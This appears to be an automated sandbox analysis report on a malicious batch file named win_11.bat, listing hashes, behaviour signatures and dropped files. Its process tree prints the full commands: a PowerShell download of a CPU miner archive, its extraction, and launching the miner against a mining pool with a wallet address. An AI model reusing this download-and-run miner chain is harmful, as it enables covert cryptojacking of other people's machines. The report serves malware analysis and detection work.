Analysis

  • max time kernel
    1798s
  • max time network
    1780s
  • platform
    windows10-1703_x64
  • resource
    win10-20230621-en
  • resource tags
    arch:x64, arch:x86, image:win10-20230621-en, locale:en-us, os:windows10-1703-x64, system
  • submitted
    30-06-2023 14:47

General

  • Target
    win_11.bat
  • Size
    706B
  • MD5
    ddc05c409f627a4382bff4c3a49423df
  • SHA1
    0f77ae481593bc1b0669dae7a044d0b96f39413f
  • SHA256
    6daf93d284bd5d39f613d6d3f96c083d1b99baa10e7acbf65f74ab84fe551887
  • SHA512
    0bdfacc137a0f40cfffa34d3549961fe20dc35905e14a9b5c207cab380594dff09dfe641a534fb0d3211bcce3b727801df8c7c635fbc9c0cd26d6e7914818cc3

Score
10/10
upx

Malware Config

Extracted

  • Language
    ps1
  • Deobfuscated
  • URLs
    exe.dropper
    https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-win.zip

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Executes dropped EXE 1 IoCs
  • UPX packed file 49 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\win_11.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4696
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-win.zip', 'cpuminer-opt-win.zip')"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:372
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "Expand-Archive -Force -Path cpuminer-opt-win.zip -DestinationPath cpuminer-opt"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1364
    • C:\Users\Admin\AppData\Local\Temp\cpuminer-opt\cpuminer-sse2.exe
      .\cpuminer-sse2.exe -a cpupower -o stratum+tcp://cpupower.eu.mine.zpool.ca:6240 -u oHyVvSQ3HDCgrM7MSJNzWmisqohcssm15C -p -c=OMEGA
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:4372

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize
    3KB
    MD5
    56efdb5a0f10b5eece165de4f8c9d799
    SHA1
    fa5de7ca343b018c3bfeab692545eb544c244e16
    SHA256
    6c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108
    SHA512
    91e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize
    1KB
    MD5
    1c13dd6d305ebb42255b5a18ab5993f7
    SHA1
    a3b0fc331de0a478ebbff869e73bf38ad68d34dd
    SHA256
    89046e3cb34f0e2bb8c56478403875eb5301c6e2ad16e5ea5a1e48aff9e73b05
    SHA512
    219c986318c21489c40a22c5125b8a11b61c5abdb1d2445c9c4f34ca6ae4419f766c288f2dc8b474159ffebf00c1c864025c32a6cee80583d26d9a0a24a53963

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zkbrf4qe.irc.ps1
    Filesize
    1B
    MD5
    c4ca4238a0b923820dcc509a6f75849b
    SHA1
    356a192b7913b04c54574d18c28d46e6395428ab
    SHA256
    6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
    SHA512
    4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

  • C:\Users\Admin\AppData\Local\Temp\cpuminer-opt-win.zip
    Filesize
    20.9MB
    MD5
    99cc95c9ce13cf3da743e1d56dabe92d
    SHA1
    e819db3b6ad4703fbc8535dadad3ad29d3cc2039
    SHA256
    df84febc2319e8e5cca7e6d0c9341d4a6824fb28646c1e435b7da58e9f9ec59b
    SHA512
    932523c4ab20c83343395498be61497dbc9ad90b3b35d3551817b94dd530b083b07d3a4b37b04c4f3d97ed1e8bb036d9d18b079a86ce46816b3a31d9eba35c02

  • C:\Users\Admin\AppData\Local\Temp\cpuminer-opt\cpuminer-sse2.exe
    Filesize
    2.6MB
    MD5
    d136eb0fdd0e7826893f332c7fc3f7a2
    SHA1
    1e7fd635278e954eb0ee8cb951d16e4ecf60592f
    SHA256
    993929dd32eaa7aeba81ed940fc65a9a545a8e1380be516d8086ad0376448a26
    SHA512
    895e72ad7dc045bdcff8a5e4e070fcb56a1361d99272d0f968cf9e83b7a568fe93c132c9d3e810292c08e8d7d4f8592ca7ed253be00bd3381a3f939a87b83757
